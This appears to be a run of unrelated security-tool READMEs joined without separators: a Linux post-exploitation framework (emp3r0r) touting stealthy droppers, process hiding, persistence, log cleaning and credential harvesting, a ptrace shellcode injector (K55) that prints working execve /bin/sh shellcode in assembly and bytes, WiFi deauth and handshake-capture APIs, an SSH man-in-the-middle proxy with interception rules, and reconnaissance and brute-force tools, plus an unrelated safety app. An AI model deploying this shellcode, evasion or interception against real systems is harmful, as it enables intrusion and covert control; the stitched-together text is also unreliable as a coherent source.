linux post-exploitation framework made by linux user

Still under active development

• 中文介绍
• check my blog for updates
• how to use

• packer: cryptor + memfd_create
• packer: use shm_open in older Linux kernels
• dropper: shellcode injector - python
• injector: inject shellcode into another process, using GDB
• port mapping: forward from CC to agents, so you can use encapsulate other tools (such as Cobalt Strike) in emp3r0r's CC tunnel
• dropper: shellcode injector - dd
• dropper: downloader (stage 0) shellcode
• network scanner
• passive scanner, for host/service discovery
• exploit kit
• conservative weak credentials scanner
• auto pwn using weak credentials and RCEs

why not? i dont see many post-exploitation frameworks for linux systems, even if there were, they are nothing like mine

as a linux user, the most critical thing for remote administration is terminal. if you hate the garbage reverse shell experience (sometimes it aint even a shell), take a look at emp3r0r, you will be impressed

yes i just want to make a post-exploitation tool for linux users like me, who want better experience in their hacking

another reason is compatibility. as emp3r0r is mostly written in Go, and fully static (so are all the plugins used by emp3r0r), it will run everywhere (tested on Linux 2.6 and above) you want, regardless of the shitty environments. in some cases you wont even find bash on your target, dont worry, emp3r0r uploads its own bash and many other useful tools

why is it called emp3r0r? because theres an empire

i hope this tool helps you, and i will add features to it as i learn new things

• beautiful terminal UI
• perfect reverse shell (true color, key bindings, custom bashrc, custom bash binary, etc)
• auto persistence via various methods
• post-exploitation tools like nmap, socat, are integreted with reverse shell
• credential harvesting
• process injection
• ELF patcher
• hide processes and files via libc hijacking
• port mapping, socks5 proxy
• auto root
• LPE suggest
• system info collecting
• file management
• log cleaner
• stealth connection
• internet access checker
• autoproxy for semi-isolated networks
• all of these in one HTTP2 connection
• can be encapsulated in any external proxies such as TOR, and CDNs
• and many more...

emp3r0r utilizes HTTP2 (TLS enabled) for its CC communication, but you can also encapsulate it in other transports such as TOR, and CDNs. all you need to do is tell emp3r0r agent to use your proxy

also, emp3r0r has its own CA pool, agents trusts only emp3r0r's own CA (which you can generate using build.py), making MITM attack much harder

below is a screenshot of emp3r0r's CC server, which has 3 agent coming from 3 different transports

emp3r0r agents check if they have internet access on start, and start a socks5 proxy if they do, then they broadcast their proxy addresses (in encrypted form) on each network they can reach

if an agent doesn't have internet, its going to listen for such broadcasts. when it receives a working proxy, it starts a port mapping of that proxy and broadcasts it to its own networks, bringing the proxy to every agent it can ever touch, and eventually bring all agents to our CC server.

in the following example, we have 3 agents, among which only one ([1]) has internet access, and [0] has to use the proxy passed by [2]

every time an agent starts, it checks a preset URL for CC status, if it knows CC is offline, no further action will be executed, it waits for CC to go online

you can set the URL to a GitHub page or other less suspicious sites, your agents will poll that URL every random minutes

no CC communication will happen when the agent thinks CC is offline

if it isnt:

bare HTTP2 traffic:

when using Cloudflare CDN as CC frontend:

packer encrypts agent binary, and runs it from memory (using memfd_create)

currently emp3r0r is mostly memory-based, if used with this packer

dropper drops a shellcode or script on your target, eventually runs your agent, in a stealth way

below is a screenshot of a python based shellcode delivery to agent execution:

currently emp3r0r uses libemp3r0r to hide its files and processes, which utilizes glibc hijacking

currently implemented methods:

• libemp3r0r
• cron
• bash profile and command injection

more will be added in the future

this is not a shell, it just executes any commands you send with sh -c and sends the result back to you

besides, it provides several useful helpers:

• file management: put and get
• command autocompletion
• #net shows basic network info, such as ip a, ip r, ip neigh
• #kill processes, and a simple #ps
• bash !!! this is the real bash shell, keep on reading!

a reverse bash shell, started with custom bash binary and bashrc, leaving no trace on the system shell

emp3r0r's terminal supports everything your current terminal supports, you can use it just like an openssh session

but wait, it's more than just a reverse bash shell, with module vaccine, you can use whatever tool you like on your target system

not implemented yet

i wrote about this in my blog

currently emp3r0r supports CVE-2018-14665, agents can exploit this vulnerability if possible, and restart itself with root privilege

upload the latest:

• mzet-/linux-exploit-suggester
• pentestmonkey/unix-privesc-check

and run them on target system, return the results

map any target addresses to CC side, using HTTP2 (or whatever transport your agent uses)

yes, there is a plugin system. please read the wiki for more information

• pty
• guitmz
• readline
• h2conn
• diamorphine
• Upgrading Simple Shells to Fully Interactive TTYs

PIDRILA: Python Interactive Deepweb-oriented Rapid Intelligent Link Analyzer is really fast async web path scanner prototype developed by BrightSearch team for all ethical netstalkers.

git clone https://github.com/enemy-submarine/pidrila.git
cd pidrila
python3 pidrila.py -u <URL>

Usage: pidrila.py [OPTIONS]

Options:
  -U, --user-agent TEXT           User-Agent
  -t, --timeout INTEGER           Request timeout  [default: 30]
  -A, --auth TEXT                 Basic HTTP auth, i.e. login:password
  -M, --max-connections-per-host INTEGER
                                  How many simultaneous connections should we
                                  open (per each host)  [default: 16]

  -m, --max-connections INTEGER   How many simultaneous connections should we
                                  open  [default: 128]

  -p, --proxy TEXT                Proxy address, like socks5h://127.0.0.1:9050
  -p, --pathlist FILENAME         Path list
  -L, --url-list FILENAME         Target URL list
  -u, --url TEXT                  Target URL, option is mutually exclusive
                                  with url_list  [required]

  -l, --logs DIRECTORY            Destination directory for    the logs
  --http-method [head|get]        HTTP method: GET or HEAD  [default: get]
  --help                          Show this message and exit.

• Asynchronous
• Can simultaneously scan unlimited number of sites
• Keep-alive support
• HTTP and SOCKS proxy support
• User agent randomization

Scan single clearweb site

 python3 ./pidrila.py -u http://silenthouse.yoba -M 128

Scan single onion site

 python3 ./pidrila.py -u http://zqktlwi4fecvo6ro.onion -m 16 -M 16 --proxy=socks5h://127.0.0.1:9050

Fast batch scan with custom User-Agent

python3 ./pidrila.py -m 2048 -L darkweb_sites_list.txt --user-agent "Pantusha/2.0 (4.2BSD)"

This tool can be used to visualize the MUD files in JSON format.

MUD files are plain text files in JSON format that contain ACL rules for a device. A MUD file can contains tens or hundrends of ACL rules which makes it difficult to read and validate the files manually. mud-visualizer will help you to read and validate (and modify in near future) the MUD files.

Use the following commands to install and run mud-visualizer:

$ git clone https://github.com/iot-onboarding/mud-visualizer
$ cd mud-visualizer
$ npm install
$ npm start

Currently the following MUD abstractions are supported in both incoming and outgoingtraffic directions:

• domain-names
• local-networks
• same-manufacturer
• manufacturer
• my-controller
• controller

Contributions are welcome! Submit your pull requests to the master branch.

Feel free to reach out to us at mud@ietf.org.

Also, you are strongly encouraged to use Github's Issues to submit new issues, or request enhancements or new features.

Hello! Welcome. Wprecon (Wordpress Recon), is a vulnerabilityrecognition tool in CMS Wordpress, 100% developed in Go.

Usage

WPrecon running

Command: wprecon --url "https://www.xxxxxxx.com/" --detection-waf

—————————————————————————————————————————————————————————————————————

___       ______________________________________________   __
__ |     / /__  __ \__  __ \__  ____/_  ____/_  __ \__  | / /
__ | /| / /__  /_/ /_  /_/ /_  __/  _  /    _  / / /_   |/ /
__ |/ |/ / _  ____/_  _, _/_  /___  / /___  / /_/ /_  /|  /
____/|__/  /_/     /_/ |_| /_____/  \____/  \____/ /_/ |_/

Github: https://github.com/blackcrw/wprecon
Version: 0.0.1a
————————————————————————————————————————————————————————————————————
[•] Target: https://www.xxxxxxx.com/
[•] Starting: 09/jan/2020 12:11:17

[•] Listing enable: https://www.xxxxxxx.com/wp-content/plugins/
[•] Listing enable: https://www.xxxxxxx.com/wp-content/themes/
[•••] Status Code: 200 — URL: https://www.xxxxxxx.com/wp-admin/
[•••] I'm not absolutely sure that this target is using wordpress! 37.50% chance. do you wish to continue ? [Y/n]: Y
[•••] Status Code: 200 — WAF: Wordfence Security Detected
[•••] Do you wish to contin   ue ?! [Y/n] : Y

A pre-boot execution environment for Apple boards built on top of checkra1n.

• Install Xcode + command-line utilities
• make clean all

• Download Sam Bingner's iOS Toolchain
• Copy scripts/arm64-apple-ios12.0.0-clang to a directory in $PATH
• Adjust the TOOLCHAIN variable to point to the downloaded toolchain
• make clean all

By submitting a pull request, you certify that this contribution is coming from you and no one else. If you want to import third-party code, that shall be noted prominently for us to evaluate it appropriately.

You can build the module at example/ with an iOS cross-compiler on Linux or a Mac. Refer to scripts/ to see how to load modules.

Note that the checkra1n patchfinder is not currently open-source. However, the KPF JIT that will ship on checkra1n 0.10.0 onwards is part of this repository. That means that pongoOS builds from this repository will always boot to the shell by default instead of XNU.

sigurls is a reconnaissance tool, it fetches URLs from AlienVault's OTX, Common Crawl, URLScan, Github and the Wayback Machine.

To display help message for sigurls use the -h flag:

$ sigurls -h

     _                  _
 ___(_) __ _ _   _ _ __| |___
/ __| |/ _` | | | | '__| / __|
\__ \ | (_| | |_| | |  | \__ \
|___/_|\__, |\__,_|_|  |_|___/ v1.3.1
       |___/

USAGE:
  sigurls [OPTIONS]

OPTIONS:
  -d             domain to fetch urls for
  -sE            comma(,) separated list of sources to exclude
  -iS            include subdomains' urls
  -sL            list all the available sources
  -nC            no color mode
  -silent        silent mode: output urls only
  -sU            comma(,) separated list of sources to use

You can download the pre-built binary for your platform from this repository's releases page, extract, then move it to your $PATHand you're ready to go.

sigurls requires go1.14+ to install successfully. Run the following command to get the repo

$ GO111MODULE=on go get -u -v github.com/drsigned/sigurls/cmd/sigurls

$ git clone https://github.com/drsigned/sigurls.git; cd sigurls/cmd/sigurls/; go build; mv sigurls /usr/local/bin/; sigurls -h

sigurls will work after installation. However, to configure sigurls to work with certain services - currently github - you will need to have setup API keys. The API keys are stored in the $HOME/.config/sigurls/conf.yaml file - created upon first run - and uses the YAML format. Multiple API keys can be specified for each of these services.

Example:

version: 1.3.0
sources:
    - commoncrawl
    - github
    - otx
    - urlscan
    - wayback
keys:
    github:
        - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
        - asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39

ProtOSINT is a Python script that helps you investigate ProtonMail accounts and ProtonVPN IP addresses.

This tool can help you in your OSINT investigation on Proton service (for educational purposes only).
ProtOSINT is separated in 3 sub-modules:

• [1] Test the validity of one protonmail account
• [2] Try to find if your target have a protonmail account by generating multiple adresses by combining information fields inputted
• [3] Find if your IP is currently affiliate to ProtonVPN

Python 3

python3 protosint.py

The account name in the protonmail is case-insensitive and ProtonMail considers the "." "_" "-" symbols as transparent.
Additionnaly, any words put after a "+" sign are not taken into account.
It means that all of these email adresses below are the same as mikemike@protonmail.com :

• "mike.mike@protonmail.com"
• "mike_mike@protonmail.com"
• "mike-mike@protonmail.com"
• "mike.mike+paypal@protonmail.com"

All of these emails have the save timestamp and refers to the account mikemike@protonmail.com

Furthermore, this technique does not always give you the creation time and date of the ProtonMail account itself, but the time and date when the email address itself was created (thanks to @sector035 for the tip : https://sector035.nl/articles/2020-50)

Feel free to clone this project. For major changes, please open an issue first to discuss what you would like to change.

A tool made for specially scanning nearby devices[BLE,Bluetooth & Wifi] and execute our given command on our system when the target device comes in between range.

NOTE:- RadareEye Owner will be not responsible if any user performs malicious activities using this tool. Use it for Learning purpose only.

• Installation of RadareEye :

git clone https://github.com/souravbaghz/RadareEye

./radare <mac_addr> <option>

• -blue Bluetooth RadareEye
• -ble BLE radareEye
• -wifi Wifi AP radareEye

• Running Bluetooth RadareEye :

sudo bash radare XX:XX:XX:XX:XX:XX -blue

• Running BLE RadareEye :

sudo bash radare XX:XX:XX:XX:XX:XX -ble

Same for the Wifi also with -wifi option, Here XX:XX:XX:XX:XX:XX means your target device's MAC Address & make sure to do with sudo (if you aren't root). I didn't add scanning feature in this script but you can get thr MAC Adress easily by executing 'hcitool scan' for bluetooth and 'hcitool lescan' for BLE Devices in terminal.

• Below given command will shutdown our system imediatly when target device comes in range.

[+]Command you want to trigger? :shutdown now

• It will run your other script

[+]Command you want to trigger? :./myscript.py

Umbrella is an Android mobile app developed by Security First that provides human rights defenders with the information on what to do in any given security situation and the tools to do it. It allows the user to choose what they want to do, such as: protect data; securely make a call/email; securely access the internet; plan secure travel; protect their office/home; conduct counter-surveillance; or deal with kidnapping, arrest or evacuation. Once a situation is chosen, the app outlines what to do and what tools to use given your circumstances. This is followed by a simple checklist of recommended actions that can be customised, saved and shared securely. Umbrella’s Feed also provides users with an up-to-the-minute account of potential risks in their chosen location.

Umbrella is designed for everyone (people looking to increase their security, folks living in high-risk areas, regular travellers, business people, techies, journalists, NGO staff, aid workers, human rights defenders, social workers, environmental activists, etc).

However, when we built Umbrella we tried to keep in mind the story of Glen Greenwald and Edward Snowden. Greenwald couldn't communicate with Snowden at the start because he found it cumbersome to set up encryption (he nearly missed one of the biggest stories of the decade because of this!). Also, when he (and Laura Poitras) travelled to Hong Kong - they didn't have much knowledge about how to meet securely with Snowden and detect surveillance. This is a common problem for journalists and activists. Umbrella is designed to solve this problem (and others) by having nearly everything they would have needed to know in one place - in their pocket.

Introduction: This is the part the user sees first. It explains briefly how the app works and the basic terms and conditions.

Menu: The bottom navigation menu is the main way for a user to navigate. It lists the feed, forms, lessons (with tool guides), checklists and account.

Feed: The feed contains security feeds from places like the UN Relief Web and the US Centers for Disease Control. You enter your location (and how often you want to be updated). Every a new update is released (e.g a disease outbreak in your location), the information comes up on the dashboard.

Lessons: Lessons are where users can learn about topics and things that they can do to improve their security. Some of the lessons have different levels (Beginner, Advanced, Expert) depending on your needs, ability, and risk. Each module is broken down into sections. At the end of each module is a list of other resources and further reading.

Tool Guides: These are detailed guides about how to use software and apps mentioned in the lessons.

Checklists: Checklists are quick and easy references to help users implement the advice in the lessons. You can tick them off as you complete each item. Items can be edited. You may also create custom checklists. If you start ticking a checklist, you will then see them on the Checklists page. Checklists can also be shared through other apps such as your email.

Forms: Forms allow a user to quickly fill out and share important information about issues such as their travel plan in a high-risk location or report on a digital/physical security incident.

The general flow of lessons is presented in order to replicate the typical way that a user works. Protecting their information -> Communicating with other people -> Arranging and travelling to a location -> Doing their operations and work -> Dealing with personal issues that may arise-> Seeking support if something goes wrong.

These are the lessons currently in Umbrella.

• Security Planning

These lessons mostly cover the security of information that is stored on your computers.

• Managing information
• Malware
• Passwords
• Protecting Files
• Safely Deleting
• Backing Up
• Protect your workplace
• Workplace raids

These lessons mostly cover the security of information when it is sent or received.

• Mobile Phones
• Making a call
• Sending a message
• Email
• Censorship
• Online Privacy
• Phishing
• Radios and satellite phones
• Online abuse

These lessons cover the security of travelling in high-risk areas.

• Preparation
• Borders
• Vehicles
• Checkpoints
• Protective Equipment

These lessons include topics that may affect you in your work.

• Meetings
• Being followed
• Protests
• Dangerous Assignments
• Public Assignments
• Public Communications
• Whistleblowers

These lessons cover how to respond to events.

• Arrests
• Evacuation
• Kidnapping
• Sexual Assault
• Terrorism

• Stress

Explains places to get extra help if you have a problem.

• Physical
• Digital

These are detailed guides about how to use software and apps mentioned in the lessons. These are the tools currently covered in the tool guide.

• Messaging
  • Mailvelope
  • ObscuraCam
  • Pidgin
  • Psiphon
  • Signal for Android
  • Signal for iOS
• Encryption
  • Encrypt your iPhone
  • k9 & Open Keychain
  • KeePasXC
• PGP
  • PGP for Linux
  • PGP for MacOS
  • PGP for Windows
• Tor
  • Orbot & Orfox
  • Tor for MacOS
  • Tor for Linux
  • Tor for Windows
• Files
  • Cobian Backup
  • Recuva
  • VeraCrypt
• Other
  • Android
  • Facebook

Contains explanations of the various terms used in the app.

Explains the licences that we use for and by Umbrella. Also says a big THANKYOU to everyone whose work we built on to make it happen.

These are the sources that we currently include for real-time updated security Feeds. For privacy reasons, users never connect directly to these services. We are always looking for more useful sources that will help users keep updated on the move.

• ReliefWeb / UN: excellent physical security updates that amalgamate information from the UN and various NGOs - though not available in every country
• Foreign and Commonwealth Office: foreign travel advice, consular help and services abroad and document legislation
• Centers for Disease Control: updates on disease and health warnings
• Global Disaster Alert and Coordination System: updates on natural disaster issues such as floods, earthquakes and tsunamis
• US State Department Country Warnings: updates mainly focused on the security situation for travellers and internationals - available for every country

Navigate to the "Account" from the bottom menu. Here you can:

• Modify settings (feed interval, feed location, feed sources, notifications, connections, import data, export data)
• Enable Mask
• Set a password
• Log out

You need an Android phone with a minimum version of 4.0.3 (SDK 15 - ICE_CREAM_SANDWICH_MR1)

Unfortunately stuff breaks sometimes. If you are in a hurry and have found a code or content problem then please email it to support@secfirst.org. If you have a little more time we generally try to manage any bugs using GitHub. Please search the existing issues for your bug and create a new one if the issue is not yet tracked.

https://github.com/securityfirst/Umbrella_android/issues

If the issue you have identified is a security risk to users, please read the documentation about our responsible disclosure policy here:

https://secfirst.org/legal

If you wish to contact us via PGP, please drop a mail to rory@secfirst.org (2C1D3B4D)

https://pgp.mit.edu/pks/lookup?op=vindex&search=0xFFB9B5BE2C1D3B4D

Contributing Ideas

Ideas are powerful things! If you have any about what we could do better or things which you think we should do in the future, please email us at info@secfirst.org.

We have a really big development plan of functionality we want to include in the future and are currently in the process of building a way to manage contributions from the open source community. Until we have that up please drop us a mail at info@secfirst.org if you are interested in contributing a specific part of future code. If there is something you want to help out within the interim, then here is some basic advice:

1. Fork it!

2. Create your feature branch: git checkout -b my-new-feature

3. Commit your changes: git commit -am 'Add some feature'

4. Push to the branch: git push origin my-new-feature

5. Submit a pull request :D

Build Instructions

Build it yourself

Thanks to everyone who has contributed code to Umbrella. It wouldn’t have happened without you.

• Rok Biderman – Security First Lead Developer

• Vesna Planko – Security First Lead UI/UX Designer

• Alex Guerrieri – Security First Developer

• Adam Hani Schakaki – Security First Developer

Cryptography Notice

This distribution includes cryptographic software. The country in which you currently reside may have restrictions on the import, possession, use, and/or re-export to another country, of encryption software. BEFORE using any encryption software, please check your country's laws, regulations and policies concerning the import, possession, or use, and re-export of encryption software, to see if this is permitted.

See http://www.wassenaar.org/ for more information.

(pronounced: "kay fifty-five")
The K55 payload injection tool is used for injecting x86_64 shellcode payloads into running processes. The utility was developed using modern C++11 techniques as well as some traditional C linux functions like ptrace(). The shellcode spawned in the target process is 27 bytes and it executes /bin/sh (spawns a bash shell) within the target's address space. In the future, I will allow users to input there own shellcode via command line arguments.

1. git clone https://github.com/josh0xA/K55.git
   
2. cd K55
   
3. chmod +x build-install.sh
   
4. ./build-install.sh
   

Usage: ./K55 <process-name>

• process-name can be any linux process with r-xp or execstack permissions.
  

Test 1) In one terminal (K55/ Directory), run: ./k55_example_process/k55_test_process
Test 2) In another terminal, run the injector: ./K55 k55_test_process

• A shell is spawned in k55_test_process when the K55 shellcode injector is ran (as root).

Obviously, ptrace(PTRACE_POKETEXT...) calls are not the most disguised. So, some applications can limit the effect of K55. Although, for security testing, make sure to turn on execstack for your target applications. For example if I'm testing on gdb, before I would inject, I would run the following: sudo execstack -s /usr/bin/gdb. Install execstack from you distrobutions package manager. For Arch Linux users, you can find execstack on the AUR.

Note: The following is a demonstration. The payload string is already hardcoded into K55.

main:
    xor eax, eax
    mov rbx, 0xFF978CD091969DD1
    neg rbx
    push rbx
    push rsp
    pop rdi
    cdq
    push rdx
    push rdi
    push rsp
    pop rsi
    mov al, 0x3b
    syscall

#include <stdio.h>
#include <string.h>

// Shellcode breakdown of the assembly code.
char code[] = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";

int main()
{
    printf("len:%d bytes\n", strlen(code));
    (*(void(*)()) code)();
    return 0;
}

http://shell-storm.org/shellcode/files/shellcode-806.php
https://0x00sec.org/t/linux-infecting-running-processes/1097

• The leading rogue access point and WiFi pentest toolkit for close access operations.
• Passive and active attacks analyze vulnerable and misconfigured devices.
• @HAK5

Author:: TW-D

Version:: 1.0.2

Copyright:: Copyright (c) 2021 TW-D

License:: Distributes under the same terms as Ruby

Doc:: https://docs.hak5.org/hc/en-us/articles/360049854174-WiFi-Pineapple-Mark-VII-REST-API

Requires:: ruby >= 2.7.0, rest-client 2.1.0 gem and Pineapple MK7 Firmware 1.0.1

Installation::

• sudo apt-get install ruby ruby-dev

• sudo gem install rest-client

See/edit/execute the files in the samples/ folder

system = PineappleMK7::System.new()

system.host = (string) "172.16.42.1"
system.host()
system.port = (string) "1471"
system.port()
system.mac = (string) "00:13:37:DD:EE:FF"
system.mac()
system.password = (string) "P@55w0rD"
system.login()

host(), port() and mac() accessors return string

login() method return boolean

recon = PineappleMK7::Modules::Recon

recon.startScan( (integer) time )
recon.getResults( (integer) scanID )
recon.deleteScan( (integer) scanID )

startScan method have scanID() submethod and return integer

getResults method have APResults(), UnassociatedClientResults() and OutOfRangeClientResults() submethods

APResults() submethod return array of objects where object have :

ssid()
bssid()
encryption()
hidden()
wps()
channel()
signal()
clients() -> client_mac(), ap_mac() and ap_channel()

UnassociatedClientResults() submethod return array of objects where object have :

client_mac()
ap_mac()
ap_channel()

OutOfRangeClientResults() submethod return array of objects where object have :

client_mac()
ap_mac()
ap_channel()

pineAP = PineappleMK7::Modules::PineAP

pineAP.enable()
pineAP.startHandshakesCapture( (hash/object) ap )
pineAP.deauthAP( (string) bssid, (integer) channel, (array) clients )
pineAP.deauthClient( (string) bssid, (integer) channel, (string) mac )
pineAP.stopHandshakesCapture()
pineAP.getHandshakes()
pineAP.filterClient( (string "allow" or "deny") mode )
pineAP.filterSSID( (string "allow" or "deny") mode )
pineAP.addSSID( (string) ssid )
pineAP.clearPool()
pineAP.setRogue()
pineAP.getClients()
pineAP.disable()

getHandshakes() method have handshakes() submethod return array of objects where object have :

type()
bssid()

getClients() method return array of objects where object have :

mac()
ip()
hostname()
ssid()
tx_bytes()
rx_bytes()

notifications = PineappleMK7::Modules::Notifications

notifications.clearAll()

download = PineappleMK7::Modules::Download

download.handshake( (string) bssid, (string) type, (string) destination )

stegbrute is a fast steganographybrute force tool written in Rust using also threads to achieve a faster execution

Stegbrute cannot run without steghide!, to install steghide run :

apt-get install -y steghide

if you are not in a debian distribution you can download it from steghide website

stegbrute can be installed in different ways:

throught cargo (Rust package manager)

if you don't have cargo you can install it either from apt or by downloading Rust lang

cargo install stegbrute

this will work for every platform

if you have ubuntu/kali or other debian distributions you can install the .deb file you find on the releases section, then unpack the file and run it

wget https://github.com/R4yGM/stegbrute/releases/download/0.1.1/stegbrute_0.1.1_amd64.deb &&
dpkg --install stegbrute_0.1.1_amd64.deb

if you don't have docker installed you can follow their guide

first you have to pull the docker image (only 4.93 MB) from the docker registry, you can see it here, if you don't want to pull the image you can also clone the repository and then build the image from the Dockerfile

docker pull r4yan/stegbrute:latest

you can also decide to pull different images by replacing 'latest' with a stegbrute version, ex.

docker pull r4yan/stegbrute:0.1.0

if you don't want to pull the image you can download/copy stegbrute Dockerfile that can be found here and then build the image from the Dockerfile

then if you want to launch the container you have to first create a volume to share your files to the container

docker volume create --name stegbrute_data

then move or copy the files you want to use for stegbrute inside the volume folder wich usually is here /var/lib/docker/volumes/stegbrute_data/_data by just doing

cp wordlist.txt /var/lib/docker/volumes/stegbrute_data/_data && cp file.jpg /var/lib/docker/volumes/stegbrute_data/_data

and now run stegbrute

docker run -v stegbrute_data:/stegbrute_data -it --rm --name stegbrute r4yan/stegbrute:latest <options>

replace the <options> with the options/arguments you want to give to stegbrute, once you did everything you don't have to pull/build the image again only if there are new updates or features

Always save your results inside the volume and not in the container because then the results will be deleted! you can save them by adding this option -x /$VOLUME_NAME/results.txt or --extract-file /$VOLUME_NAME/results.txt

if you added this and did everything correctly at the end of every attack you'd find the results inside the folder /var/lib/docker/volumes/stegbrute_data/_data

this will work for every platform

you can also download the already compiled programn and then execute it, example :

wget https://github.com/R4yGM/stegbrute/releases/download/0.1.1/stegbrute && chmod +x stegbrute
mv stegbrute /usr/local/bin/

stegbrute is very simple to use and it gives you many options, you can view the program help with the -h or --help option

============================================================
     ____  _             ____             _
    / ___|| |_ ___  __ _| __ ) _ __ _   _| |_ ___
    \___ \| __/ _ \/ _` |  _ \| '__| | | | __/ _ \
     ___) | ||  __/ (_| | |_) | |  | |_| | ||  __/
    |____/ \__\___|\__, |____/|_|   \__,_|\__\___|
                   |___/

StegBrute v0.1.1 - By R4yan
https://github.com/R4yGM/StegBrute

StegBrute 0.1.1
R4yan <yessou.rayan@gmail.com>
Steganography bruteforce tool

USAGE:
    stegbrute [FLAGS] [OPTIONS] --file-name <file-name> --wordlist <wordlist>

FLAGS:
    -h, --help       Prints help information
    -V, --version    Prints version information
    -v, --verbose    shows every try the program does

OPTIONS:
    -x, --extract-file <extract-file>       the file name path where you want to write the results [default:
                                         stegbrute_results.txt]
    -f, --file-name <file-name>          the file name path you want to crack
    -t, --threads <threads>              number of threads to bruteforce the file [default: 3]
    -w, --wordlist <wordlist>            path of the wordlist

for example :

Options :

• -x or --extract-file with <file_name> will save the results of the extracted data into the file_name, if no file is specified stegbrute will save your results inside ./stegbrute_results.txt file

• -t or --threads with <number_of_threads> will launch a number of programs bruteforcing the file simultaneously, incrementing the number of threads doesn't always mean this will run more faster it all depends on how many threads your machine can handle

• -f or --file_name with <file_name> the file name that stegbrute is going to attack, must be one of these supported formats : JPEG, BMP, WAV or AU

• -w or --wordlist with <wordlist> the file where stegbrute is going to take the passwords line by line and then start trying them to the file you want to crack, if you don't have one you can install for example rockyou.txt

stegbrute benchmark on different wordlists using 3 threads

ssh-mitm is an intercepting (mitm) proxy server for security audits.

• Redirect/mirror Shell to another ssh client supported in 0.2.8
• Replace File in SCP supported in 0.2.6
• Replace File in SFTP supported in 0.2.3
• Transparent proxy support in 0.2.2! - intercepting traffic to other hosts is now possible when using arp spoofing or proxy is used as gateway.
• Since release 0.2.0, SSH Proxy Server has full support for tty (shell), scp and sftp!

do not use this library in production environments! This tool is only for security audits!

pip install ssh-mitm

Start the server:

ssh-mitm --remote-host 127.0.0.1

Connect to server:

ssh -p 10022 user@proxyserver

When public key authentication is used, the agent is forwarded to the remote server.

Start the server:

ssh-mitm --forward-agent --remote-host 127.0.0.1

Connect to server:

ssh -A -p 10022 user@proxyserver

SSH uses trust on first use. This means, that you have to accept the fingerprint if it is not known.

$ ssh -p 10022 hugo@localhost
The authenticity of host '[localhost]:10022 ([127.0.0.1]:10022)' can't be established.
RSA key fingerprint is SHA256:GIAALZgy8Z86Sezld13ZM74HGbE9HbWjG6T9nzja/D8.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[localhost]:10022' (RSA) to the list of known hosts.

If a server fingerprint is known, ssh warns the user, that the host identification has changed.

$ ssh -p 10022 remoteuser@localhost
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
SHA256:GIAALZgy8Z86Sezld13ZM74HGbE9HbWjG6T9nzja/D8.
Please contact your system administrator.
Add correct host key in /home/user/.ssh/known_hosts to get rid of this message.
Offending RSA key in /home/user/.ssh/known_hosts:22
  remove with:
  ssh-keygen -f "/home/user/.ssh/known_hosts" -R "[localhost]:10022"
RSA host key for [localhost]:10022 has changed and you have requested strict checking.
Host key verification failed.

If the victim accepts the (new) fingerprint, then the session can be intercepted.

When ssh proxy server is used as a honey pot, attackers will accept the fingerprint, because he wants to attack this machine. An attacker also does not know if the fingerprint is correct and if the key has changed, perhaps it the server was reinstalled and a new keypair was generated.

When trying to figure out the communication schematics of an application, intercepting ssh can be an invaluable tool.

For example, if you have an application, which connects to you local router via ssh, to configure the device, you can intercept those connections, if the application does not know the fingerprint and accepts it on first use.

If the application knows the fingerprint, then the same host key is used on every device. In this case, you have a good chance to extract the host key from a firmware updated and use it to trick the application.

When the ssh proxy server needs to monitor general ssh communication in a network the transparent feature can be used.

To setup this feature correctly and intercept ssh traffic to multiple different hosts traffic needs to be routed through the ssh proxy server.

SSH packets that need to be audited can now be transparently processed and forwarded by the ssh proxy server making use of the TPROXY feature of the linux kernel.

For example, when traffic is routed through a CentOS 7 machine following configuration can be used:

iptables -t mangle -A PREROUTING -p tcp --dport 22 -j TPROXY --tproxy-mark 0x1/0x1 --on-port=10022 --on-ip=127.0.0.1

# Saving the configuration permanently
yum install -y iptables-services
systemctl enable iptables
iptables-save > /etc/sysconfig/iptables
systemctl start iptables

# Making use of directly and permanently adding a rule to the iptables table
firewall-cmd --direct --permanent --add-rule ipv4 mangle PREROUTING 1 -p tcp --dport 22 --j TPROXY --tproxy-mark 0x1/0x1 --on-port=10022 --on-ip=127.0.0.1

:information: additional firewall rules may be necessary to maintain device management capabilities over ssh

To process the packets locally further routing needs to take place:

echo 100 tproxy >> /etc/iproute2/rt_tables
ip rule add fwmark 1 lookup tproxy
ip route add local 0.0.0.0/0 dev lo table tproxy

# Setting routes and policies persistent
echo 'from all fwmark 0x1 lookup tproxy' >> /etc/sysconfig/network-scripts/rule-lo
echo 'local default dev lo scope host table tproxy' >> /etc/sysconfig/network-scripts/route-lo

Now only the ssh proxy server needs to be started in transparent mode to be able to handle sockets that do not have local addresses:

ssh-mitm --transparent

https://powerdns.org/tproxydoc/tproxy.md.html

The proxy can be configured and extended using command line arguments.

Some arguments accept Python-class names as string.

Loading a class from a package:

ssh-mitm --ssh-interface ssh_proxy_server.forwarders.ssh.SSHForwarder

⚠️

creating a pip package for custom classes is recommended, because loading from files has some bugs at the moment

Loading a class from a file (experimental):

ssh-mitm --ssh-interface /path/to/my/file.py:ExtendedSSHForwarder

• cmd argument:--ssh-interface
• base class:ssh_proxy_server.forwarders.ssh.SSHBaseForwarder
• default:ssh_proxy_server.forwarders.ssh.SSHForwarder

• ssh_proxy_server.forwarders.ssh.SSHForwarder - forwards traffic from client to remote server
• ssh_proxy_server.plugins.ssh.sessionlogger.SSHLogForwarder - write the session to a file, which can be replayed with script
• ssh_proxy_server.plugins.ssh.noshell.NoShellForwarder - keeps the session open, when used as master channel, but tty should not be possible to the remote server
• ssh_proxy_server.plugins.ssh.mirrorshell.SSHMirrorForwarder - Mirror ssh session to another ssh client
• ssh_proxy_server.plugins.ssh.injectorshell.SSHInjectableForwarder - Creates injection shells for listening on and writing to a ssh session

• cmd argument:--scp-interface
